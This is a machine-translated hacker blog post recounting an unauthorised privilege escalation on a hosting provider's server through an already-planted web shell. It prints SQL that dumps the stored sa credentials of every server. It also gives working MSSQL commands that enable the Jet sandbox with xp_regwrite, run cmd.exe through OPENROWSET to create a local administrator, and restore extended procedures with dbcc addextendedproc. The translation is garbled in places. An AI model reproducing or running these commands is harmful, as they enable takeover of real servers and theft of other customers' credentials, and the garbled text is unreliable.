Record the twists and turns of out-of-stars elevation

BY: Angel wings
BLOG:Http://hi.baidu.com/hack078
T00ls initial release
Today, my friend lost a SHELL from the off-star main site.
I don't know how he did it. All permissions are set, and all NB components are deleted. Only ASP Khan's support is that all permissions are not written or modified, I don't know how Y got the SHELL.
This is not the case. His horse is a little faulty, and he is not happy to use it,
Fortunately, I found the database connection file on Global. asa. It wasn't SA, but the password was the same as SA. I wanted to directly escalate the permission. I didn't want to delete any components, and I was not used to using this SHELL.
You can't execute the command, and the SHELL has no write and modification permissions. the header is big, and then you can directly connect it with the SQL statement that comes with the SHELL.
Check the table or something.
SELECT * FROM [FreeHost_Serversqllist]
This table obtains some data.

The sa root account of all his servers contains the local account. Well, it's a little fun, but it's just a little early. Then, I want to raise the UDF permission, but I don't have the write permission. I'm dizzy.
What should I do? I thought about it and checked the host activated on the machine. Maybe he is not an independent server ,,
SELECT * FROM [FreeHost_Product_Host]

I checked that there were not many sites, but I had to look for more than 300 sites. I found the same server. I didn't have the write permission for the external directory. I started from FTP directly ,, I found a website and passed the UDF over FTP. I thought this was done. The UDF cannot be exported.
I thought it would be a matter of downgrading. I asked in the group. Well, you can't configure the permissions outside of the stars.
After more than an hour, I was not depressed.
Actually, I took a detour. Remember to use the SA sandbox to raise the right.
Then I tried to delete all the xp_mongoshell and other components.
Baidu YY found the xp_mongoshell recovery, but failed to execute the command and did not know why, and then found that it was a horse problem.
I didn't go to the sandbox, but Baidu found a new method.
Run the xp_cmdshell and xplog70.dll commands in SA.

Html "target = _ blank>Http://www.4shell.org/archives/242.html

In this case, the command must have xp_regwrite.

First, enable the sandbox mode:

Exec master.. xp_regwrite HKEY_LOCAL_MACHINE, SOFTWAREMicrosoftJet4.0Engines, SandBoxMode, REG_DWORD, 1


Then run the system command using jet. oledb.

Select * from openrowset (microsoft. jet. oledb.4.0,; database = c: windowssystem32iasias. mdb, select shell ("cmd.exe/c net user admin/add "))
Select * from openrowset (microsoft. jet. oledb.4.0,; database = c: windowssystem32iasias. mdb, select shell ("cmd.exe/c net localgroup administrators admin/add "))


Failed to find
Dbcc addextendedproc (xp_regread, xpstar. dll)

Dbcc addextendedproc (xp_regwrite, xpstar. dll)

I restored it, and succeeded in Elevation of Privilege.
But when I joined the Management Group
I wrote a wrong command and thought that he had changed the management level. It was just half a day before he found out

I am not good at literary talent. Well, after writing for half a day, I found that the above text YY was too big.
Http://www.4shell.org/archives/242.html
Http://www.4shell.org/archives/1718.html
These two articles are useful to you,
Show the results